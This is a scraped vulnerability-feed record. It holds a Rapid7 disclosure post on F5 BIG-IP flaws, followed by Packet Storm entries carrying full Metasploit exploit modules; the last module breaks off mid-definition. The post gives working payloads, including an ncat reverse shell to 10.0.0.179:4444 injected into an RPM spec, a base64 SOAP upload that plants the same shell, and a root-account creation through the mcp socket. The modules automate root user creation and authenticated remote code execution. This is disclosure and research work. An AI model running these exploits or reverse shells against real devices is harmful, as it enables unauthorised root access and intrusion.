They are being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Vendor statement\n\nF5 is committed to security, and we collaborate with valued researchers, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.\n\n## Exploitation\n\n### CVE-2022-41622 - Unauthenticated Remote Code Execution in SOAP API via CSRF\n\nF5 Big-IP's SOAP API (the endpoint `/iControl/iControlPortal.cgi`) does not have cross-site request forgery (CSRF) protection, nor does it require a correct `Content-Type` or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user's session. That could lead to remote code execution in several different ways, which we demonstrated in a [proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>). \n\nNote: several of the exploit paths require SELinux bypasses, which we have detailed below.\n\nThe API endpoint for SOAP requests, `iControlPortal.cgi`, which is accessible at `/iControl/iControlPortal.cgi`, is a CGI script that is SetUID root \u2014 that is, it executes as root:\n \n \n ls -l /usr/local/www/iControl/iControlPortal.cgi\n -rwsr-xr-x. 1 root root 2931172 Jul 15 01:13 /usr/local/www/iControl/iControlPortal.cgi\n \n\nThe script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the `upload_file` and `create_user_3` endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely. 
We didn't find a way to immediately run code on the target host, but our investigation did not include every possible API endpoint.\n\n[The PoC README.md file](<https://github.com/rbowes-r7/refreshing-soap-exploit/blob/main/README.md>) has full details on the payloads we tested and how to use them to execute arbitrary code at reboot or login.\n\n### CVE-2022-41800 - Authenticated Remote Code Execution via RPM Spec Injection\n\nF5 Big-IP's JSON API includes an administrator-only endpoint that creates an RPM specification file (`.rpmspec`). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created. This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.\n\nAlthough F5 considered this noteworthy enough to assign CVE-2022-41800, we consider the risk of this vulnerability to be low. While the results are surprising, this exploit requires an administrator login, and other endpoints (such as `/mgmt/tm/util/bash`) that are capable of executing shell commands by-design. 
That said, this technique can bypass blocklists or alerts that an administrator might set up for the well known `bash` endpoint.\n\nTo demonstrate the vulnerability, we developed this JSON payload:\n \n \n json\n {\n \"specFileData\": {\n \"name\": \"test\",\n \"srcBasePath\": \"/tmp\",\n \"version\": \"test6\",\n \"release\": \"test7\",\n \"description\": \"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\",\n \"summary\": \"test9\"\n }\n }\n \n\nNote the newlines and `%check` in the `description` field, which according to [the documentation](<https://rpm-software-management.github.io/rpm/manual/spec.html>) is typically used to run tests. We sent that JSON as part of an authenticated request to `/rpm-spec-creator`:\n \n \n $ curl -sk -uadmin:Password1 -H \"Content-Type: application/json\" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{\"specFileData\": {\"name\": \"test\", \"srcBasePath\": \"/tmp\", \"version\": \"test6\", \"release\": \"test7\", \"description\": \"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\", \"summary\": \"test9\"}}'\n {\"specFileData\":{\"name\":\"test\",\"srcBasePath\":\"/tmp\",\"version\":\"test6\",\"release\":\"test7\",\"description\":\"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\",\"summary\":\"test9\",\"user\":\"restnoded\",\"group\":\"restnoded\"},\"specFilePath\":\"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\"}\n \n\nThe server responds with a `specFilePath` containing the spec we created. 
Here's what the file looks like on the file system:\n \n \n $ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\n Summary: test9\n Name: test\n Version: test6\n Release: test7\n BuildArch: noarch\n Group: Development/Libraries\n License: Commercial Packager: \n F5 Networks <support@f5.com>\n \n %description\n test8\n \n %check\n n.cat -e /bin/bash 10.0.0.179 4444\n \n [...]\n \n\nWe start our listener on the host/port specified in the `ncat` command:\n \n \n $ nc -v -l -p 4444\n Ncat: Version 7.93 ( https://nmap.org/ncat )\n Ncat: Listening on :::4444\n Ncat: Listening on 0.0.0.0:4444\n \n\nAnd build the RPM with `/build-package` (using `jq` to format the output):\n \n \n sh\n $ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{\"state\": {}, \"appName\": \n \"test\", \"packageDirectory\": \"/tmp\", \"specFile\n Path\": \"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\", \"force\": true }' | jq\n \n {\n \"step\": \"RUN_BUILD_RPM_TASK\",\n \"packageDirectory\": \"/tmp\",\n \"appName\": \"test\",\n \"specFilePath\": \"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\",\n \"force\": true,\n \"rpmDescription\": \"Default exported iApp description.\",\n \"rpmSummary\": \"Default exported iApp summary.\",\n \"isSpecFileToCleanUp\": false,\n \"id\": \"5de02c7f-ac65-4fa0-8c2b-b541967ce578\",\n \"status\": \"CREATED\",\n \"userReference\": {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n },\n \"identityReferences\": [\n {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n }\n ],\n \"ownerMachineId\": \"97163127-c56e-456c-af33-752dec349873\",\n \"generation\": 1,\n \"lastUpdateMicros\": 1666214391730921,\n \"kind\": \"shared:iapp:build-package:buildrpmtaskstate\",\n \"selfLink\": \"https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578\"\n }\n \n\nThen, we verify that we get a root in 
shell on our listener:\n \n \n $ nc -v -l -p 4444\n Ncat: Version 7.93 ( https://nmap.org/ncat )\n Ncat: Listening on :::4444\n Ncat: Listening on 0.0.0.0:4444\n Ncat: Connection from 10.0.0.162.\n Ncat: Connection from 10.0.0.162:58068.\n \n whoami\n root\n \n\n### ID1145045 - Local Privilege Escalation via UNIX Socket Permissions\n\nF5 uses a proprietary database called `mcp`, which is used for persistent storage on Big-IP (and related) devices. The database is owned by root and accessed via a UNIX domain socket with 0777 permissions (accessible by all local users) and no authentication:\n \n \n # ls -l /var/run/mcp \n srwxrwxrwx. 1 root root 0 Oct 19 14:12 /var/run/mcp\n \n\nWe can connect to it and perform queries using `socat`, which is (helpfully) installed by default.\n\nAs part of our research, we fully documented the protocol, including [writing a tool](<https://github.com/rbowes-r7/refreshing-mcp-tool>) that can parse queries, create arbitrary queries, and remotely eavesdrop on traffic via an authenticated SSH connection. While the [list of supported object types](<https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-objects.txt>) is extensive, we targeted the user-management code since our goal was security bypasses.\n\nWe developed a script called `mcp-privesc.rb`, which is also included in that repository. The script creates a root-level account when its output is sent to that socket, as well as a pre-built `escalationplz.bin` payload that creates a `rontest` / `Password1` account when sent to the socket.\n\nHere's how we used the tool to create a message. Note: it was gzipped it for size reasons, then base64-encoded so we could copy/paste more easily. 
Output is truncated for the blog, but the full text is included in the `README.md` file in the repository:\n \n \n $ ruby ./mcp-privesc.rb blogtest MyFunPW | gzip | base64 -w0\n Attempting to create a crypt-sha512 hash of the password\n Writing an `mcp` message to stdout that'll create an account: blogtest / $6$vdznqfyc$q9L[...]1\n Send it to the target using: socat -t100 - UNIX-CONNECT:/var/run/mcp < mcpmessage.bin\n \n H4s[...]A==\n \n\nThen, from a non-root account, we send the message to the socket and verify the account exists:\n \n \n $ whoami\n apache\n \n $ echo -ne 'H4s[...]A==' | base64 -d | gunzip - | socat -t100 - UNIX-CONNECT:/var/run/mcp | gzip | base64 -w0\n H4sIAB91UGMAA2NgYJBjQALcIQy8QEqMO5SBFcwPZ+AR0OCOAJKaYAUEVXNHgVRzCzIwAABM8W1YXAAAAA==\n \n bash-4.2$ su blogtest\n Password: \n [...]\n \n [blogtest@localhost:NO LICENSE:Standalone] config # whoami\n root\n \n\nF5 claims this is not a vulnerability, because, by design, all users that log in are already root (and it's true that the overwhelming majority of Big-IP's attack surface runs as root already). However, several network services\u2014including Apache, Tomcat, and Bind\u2014listen on network ports and link to custom modules written in C/C++. If a vulnerability is discovered in any of those non-root services, a privilege escalation path directly to root removes the small amount of privilege separation that exists.\n\n### ID1144093 - SELinux Bypass via Incorrect File Context\n\nAfter finding a SOAP endpoint with an arbitrary file write, we found that SELinux limited our ability to actually exploit the issue. Despite the SOAP endpoint (`iControlPortal.cgi`) being set-UID root, and therefore executing as a privileged process, it could not create or overwrite sensitive files because it runs in a restricted SELinux context. 
That means that we couldn't use obvious attack paths like adding a script to `/etc/profile.d` or replacing `/var/ssh/root/authorized_keys`.\n\nWe did, however, find exactly one file in `/etc/profile.d` that was writable from the SOAP process, because it is a symbolic link to another location:\n \n \n # ls -l /etc/profile.d/timeout.sh\n lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/timeout.sh -> ../../var/run/config/timeout.sh\n \n # ls -l /var/run/config/timeout.sh \n -r--r--r--. 1 root root 303 Oct 19 15:40 /var/run/config/timeout.sh\n \n\nIf we replace `/var/run/config/timeout.sh` with our own script via the SOAP interface, which we can (despite the file itself not having write permission), it will execute the next time a user logs in via SSH and the `/etc/profile.d` scripts run. We use that file as a target in our [SOAP exploit proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>):\n \n \n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">/var/run/config/timeout.sh</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">[...]</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nF5 argues that this is not a vulnerability, because it requires a different vulnerability to exist before it can be leveraged (as we demonstrated with CVE-2022-41622 above). As a result, it was not assigned a CVE. 
However, Rapid7 considers this a vulnerability because it bypasses a security boundary\u2014namely, SELinux. Without these SELinux bypasses, turning an arbitrary file write into code execution would be difficult, since most files an attacker would typically create or replace to exploit a file-write vulnerability (such as adding a script to `/etc/profile.d`) are blocked.\n\n### ID1144057 - SELinux bypass via Command Injection in Startup Script\n\nThe program `/bin/f5_update_checker`, which is executed at boot, is vulnerable to command injection via its configuration file (`/shared/f5_update_action`). Several strings in the file are passed directly into shell commands, where arbitrary bash commands can be injected using backticks, semicolons, or any other typical [CWE-78](<https://cwe.mitre.org/data/definitions/78.html>) technique.\n\nThis one is interesting, because we found it quite early in our research but didn\u2019t recognize its significance until much later. During our initial analysis, `f5_update_checker` caught our eye because it runs at boot, performs some sort of nebulous update check (ironically, update mechanisms are [a common source](<https://ieeexplore.ieee.org/document/6769681>) of security vulnerabilities), and is a 32-bit ELF binary written in C++. Additionally, running `strings` showed that it uses `curl` insecurely, with `-k` (which disables TLS certificate verification):\n \n \n # strings $(which f5_update_checker)\n [...]\n curl -g -k -m 30 -s -f -o /dev/null \n \n\nWhen `f5_update_checker` starts, it loads and parses a configuration file called `/shared/f5_update_action`, which doesn't exist by default. In fact, as far as we can tell, absolutely nothing else on the entire operating system is aware of `/shared/f5_update_action`! 
Out of curiosity, we reverse engineered the file format from the binary, since the process won't start without a valid (enough) file, and found it's line-based and looks something like:\n \n \n AAA\n http://localhost:1234/success\n http://localhost:1234/failure\n 0\n 0\n 0\n 0\n \n\nThe URLs are passed directly into `curl` with no escaping (not even quotes, in fact), so we can add in arbitrary commands however we like:\n \n \n AAA\n http://localhost:1234/success`touch /tmp/testshellinjection`\n http://localhost:1234/failure\n 0\n 0\n 0\n 0\n \n\nAt the next reboot, `f5_update_checker` will execute, load the configuration file, pause for two minutes (by design), then execute the command.\n\nAt that point, we shelved this as not interesting with the note:\n\n`f5_update_checker` consumes a file `/shared/f5_update_action` and grabs a URL from it. That leads to a bunch of problems - shell injection, SSRF, etc. But nothing seems to use any of this, so I guess it's all a dud\n\nMuch later, we found the SOAP bypass discussed above, but lamented that while we could upload a file to anywhere on the filesystem as root, we couldn't overwrite anything of value due to SELinux policies! After thinking for way too long, we remembered the seemingly innocuous vulnerability that we'd found a month earlier, recalled that it references a non-extant file, and tested it with SOAP. 
Sure enough, it worked!\n\nHere is an example of a SOAP request that will plant a malicious `/shared/f5_update_action` file:\n \n \n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">/shared/f5_update_action</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nThis is an interesting case in which a low-risk vulnerability can actually be meaningfully leveraged, in the right context. Specifically, we found a way to bypass SELinux and create some sneaky persistence.\n\nAs with some of the other issues documented here, F5 does not consider this to be a vulnerability and did not assign it a CVE (but does plan to fix it). Rapid7 disagrees with that assessment because SELinux is a security boundary, and bypassing SELinux is a security issue. We'd normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.\n\n## Remediation\n\nF5 has provided the following remediation advice:\n\nF5 recommends customers review the security advisories published for these issues and evaluate their risk. 
Engineering hotfixes are available on request for both CVEs, and fixes for all of the issues will be included in future releases.\n\nThe known exploitation methods for CVE-2022-41622 require the attacker to know the address for a particular BIG-IP and successfully enact a Cross-Site Request Forgery against an administrator who is using the same browser to browse the web as well as manage their BIG-IP. Normal anti-CSRF techniques will prevent this exploit from succeeding; see [K94221585](<https://support.f5.com/csp/article/K94221585>) for more details.\n\nThe known exploitation methods for CVE-2022-41800 require that an attacker be authenticated as a valid user with Resource Admin or greater privileges. Therefore, the impact is limited to those customers running with Appliance Mode enabled; see [K12815](<https://support.f5.com/csp/article/K12815>) for more information on Appliance Mode.\n\n## Timeline\n\n * July, 2022: Issues identified by Rapid7 researcher [Ron Bowes](<https://infosec.exchange/web/@iagox86>)\n * Thu, Aug 18, 2022: Privately disclosed findings to [F5 PSIRT](<https://support.f5.com/csp/article/K4602>) per [Rapid7's CVD policy](<https://www.rapid7.com/security/disclosure/#zeroday>)\n * Aug-Sep, 2022: Discussion and clarification about the issues with F5\n * Thu, Sep 8, 2022: Extension on vulnerability disclosure date requested, offered Nov 17, 2022\n * Fri, Sep 30, 2022: [CVE-2022-41622](<https://www.cve.org/CVERecord?id=CVE-2022-41622>) and [CVE-2022-41800](<https://www.cve.org/CVERecord?id=CVE-2022-41800>) reserved by F5\n * Wed, Oct 5, 2022: Disclosure date moved to Wed, Nov 16, 2022\n * Wed, Nov 16, 2022: This public disclosure\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41622 and CVE-2022-41800 with authenticated vulnerability checks for BIG-IP, expected to be available in the November 16, 2022 content release.", "published": "2022-11-16T15:00:00", "modified": "2022-11-16T15:00:00", 
"cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://blog.rapid7.com/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", "reporter": "Ron Bowes", "references": [], "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "immutableFields": [], "lastseen": "2022-11-16T16:33:31", "viewCount": 61, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-41622", "epss": "0.674370000", "percentile": "0.973420000", "modified": "2023-03-20"}, {"cve": "CVE-2022-41800", "epss": "0.064300000", "percentile": "0.925530000", "modified": "2023-03-20"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1668616476, "score": 1668618677, "epss": 1679352629}, "_internal": {"score_hash": "47d28842a5f00a3b73675e0c8f84588e"}}
{"packetstorm": [{"lastseen": "2023-02-03T15:17:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-03T00:00:00", "type": "packetstorm", "title": "F5 Big-IP Create Administrative User", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-03T00:00:00", "id": "PACKETSTORM:170847", "href": "https://packetstormsecurity.com/files/170847/F5-Big-IP-Create-Administrative-User.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'unix_crypt' \n \nclass MetasploitModule < Msf::Exploit::Local \ninclude Msf::Post::Linux::F5Mcp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 Big-IP Create Admin User', \n'Description' => %q{ \nThis creates a local user with a username/password and root-level \nprivileges. Note that a root-level account is not required to do this, \nwhich makes it a privilege escalation issue. \n \nNote that this is pretty noisy, since it creates a user account and \ncreates log files and such. Additionally, most (if not all) \nvulnerabilities in F5 grant root access anyways. 
\n \nAdapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Ron Bowes'], \n'Platform' => [ 'unix', 'linux', 'python' ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'References' => [ \n['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n], \n'Privileged' => true, \n'DisclosureDate' => '2022-11-16', \n'Arch' => [ ARCH_CMD, ARCH_PYTHON ], \n'Type' => :unix_cmd, \n'Targets' => [[ 'Auto', {} ]], \n'Notes' => { \n'Stability' => [], \n'Reliability' => [], \n'SideEffects' => [] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), \nOptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), \n \nOptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), \n]) \nend \n \ndef exploit \n# Get or generate the username/password \nfail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? 
\nusername = datastore['USERNAME'] \n \nif datastore['CREATE_SESSION'] \npassword = Rex::Text.rand_text_alphanumeric(12) \nnew_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) \n \nprint_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\") \nelse \npassword = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) \n \nprint_status(\"Will attempt to create user #{username} / #{password}\") \nend \n \n# If the password is already hashed, leave it as-is \nvprint_status('Hashing the password with SHA512') \nhashed_password = UnixCrypt::SHA512.build(password) \n \nif !hashed_password || hashed_password.empty? \nfail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') \nend \n \n# These requests have to go in a single 'session', which, to us, is \n# a single packet (since we don't have AF_UNIX sockets) \nresult = mcp_send_recv([ \n# Authenticate as 'admin' (this probably shouldn't work but does) \nmcp_build('user_authenticated', 'structure', [ \nmcp_build('user_authenticated_name', 'string', 'admin') \n]), \n \n# Start transaction \nmcp_build('start_transaction', 'structure', [ \nmcp_build('start_transaction_load_type', 'ulong', 0) \n]), \n \n# Create the role mapping \nmcp_build('create', 'structure', [ \nmcp_build('user_role_partition', 'structure', [ \nmcp_build('user_role_partition_user', 'string', username), \nmcp_build('user_role_partition_role', 'ulong', 0), \nmcp_build('user_role_partition_partition', 'string', '[All]'), \n]) \n]), \n \n# Create the userdb entry \nmcp_build('create', 'structure', [ \nmcp_build('userdb_entry', 'structure', [ \nmcp_build('userdb_entry_name', 'string', username), \nmcp_build('userdb_entry_partition_id', 'string', 'Common'), \nmcp_build('userdb_entry_is_system', 'ulong', 0), \nmcp_build('userdb_entry_shell', 'string', '/bin/bash'), \nmcp_build('userdb_entry_is_crypted', 'ulong', 1), 
\nmcp_build('userdb_entry_passwd', 'string', hashed_password), \n]) \n]), \n \n# Finish the transaction \nmcp_build('end_transaction', 'structure', []) \n]) \n \n# Handle errors \nif result.nil? \nfail_with(Failure::Unknown, 'Request to mcp appeared to fail') \nend \n \n# The only result we really care about is an error \nerror_returned = false \nresult.each do |r| \nresult = mcp_get_single(r, 'result') \nresult_code = mcp_get_single(result, 'result_code') \n \n# If there's no code or it's zero, just ignore it \nif result_code.nil? || result_code == 0 \nnext \nend \n \n# If we're here, an error was returned! \nerror_returned = true \n \n# Otherwise, try and get result_message \nresult_message = mcp_get_single(result, 'result_message') \nif result_message.nil? \nprint_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\") \nelse \nprint_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\") \nend \nend \n \n# Let them know if it likely worked \nif !error_returned \nprint_good(\"Service didn't return an error, so user was likely created!\") \n \nif datastore['CREATE_SESSION'] \nprint_status('Attempting create a root session...') \n \nout = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\") \n \nvprint_status(\"Output from su command: #{out}\") \nend \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170847/f5_create_user.rb.txt"}, {"lastseen": "2022-11-24T14:27:19", "description": "", "cvss3": {}, "published": "2022-11-24T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-24T00:00:00", "id": "PACKETSTORM:170008", "href": 
"https://packetstormsecurity.com/files/170008/F5-BIG-IP-iControl-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator', \n'Description' => %q{ \nThis module exploits a newline injection into an RPM .rpmspec file \nthat permits authenticated users to remotely execute commands. \n \nSuccessful exploitation results in remote code execution \nas the root user. \n}, \n'Author' => [ \n'Ron Bowes' # Discovery, PoC, and module \n], \n'References' => [ \n['CVE', '2022-41800'], \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n['URL', 'https://support.f5.com/csp/article/K13325942'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-11-16', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ 'Default', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts. \n'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts. 
\n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # One at a time \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('HttpUsername', [true, 'iControl username', 'admin']), \nOptString.new('HttpPassword', [true, 'iControl password', '']) \n] \n) \nend \n \ndef exploit \n# The RPM name is based on these, so we need these to delete the RPM file after \nname = rand_text_alphanumeric(5..10) \nversion = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\" \nrelease = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\" \n \nvprint_status('Creating an .rpmspec file on the target...') \nresult = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'data' => { \n'specFileData' => { \n'name' => name, \n'srcBasePath' => '/tmp', \n'version' => version, \n'release' => release, \n# This is the injection - add newlines then a '%check' section \n'description' => \"\\n\\n%check\\n#{payload.encoded}\\n\", \n'summary' => rand_text_alphanumeric(5..10) \n} \n}.to_json \n}) \n \nfail_with(Failure::Unknown, 'Failed to send HTTP request') unless result \nfail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 \nfail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code != 200 \n \njson = result&.get_json_document \nfail_with(Failure::UnexpectedReply, \"Server didn't return valid JSON\") unless json \n \nfile_path = json['specFilePath'] \nfail_with(Failure::UnexpectedReply, \"Server didn't return a specFilePath\") unless file_path \nvprint_status(\"Created spec file: #{file_path}\") \nregister_file_for_cleanup(file_path) \n \n# We can also use `exit 1` in the %check function to 
prevent this file \n# from being created, rather than cleaning it up.. but that seems noisier? \n# Neither option gets logged so /shrug \nregister_file_for_cleanup(\"/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm\") \n \nvprint_status('Building the RPM to trigger the payload...') \nresult = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'data' => { \n'state' => {}, \n'appName' => rand_text_alphanumeric(5..10), \n'packageDirectory' => '/tmp', \n'specFilePath' => file_path \n}.to_json \n}) \nfail_with(Failure::Unknown, 'Failed to send HTTP request') unless result \nfail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 \nfail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code < 200 || result.code > 299 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170008/f5_icontrol_rpmspec_rce_cve_2022_41800.rb.txt"}, {"lastseen": "2022-11-21T16:28:37", "description": "", "cvss3": {}, "published": "2022-11-21T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-21T00:00:00", "id": "PACKETSTORM:169967", "href": "https://packetstormsecurity.com/files/169967/F5-BIG-IP-iControl-Cross-Site-Request-Forgery.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) 
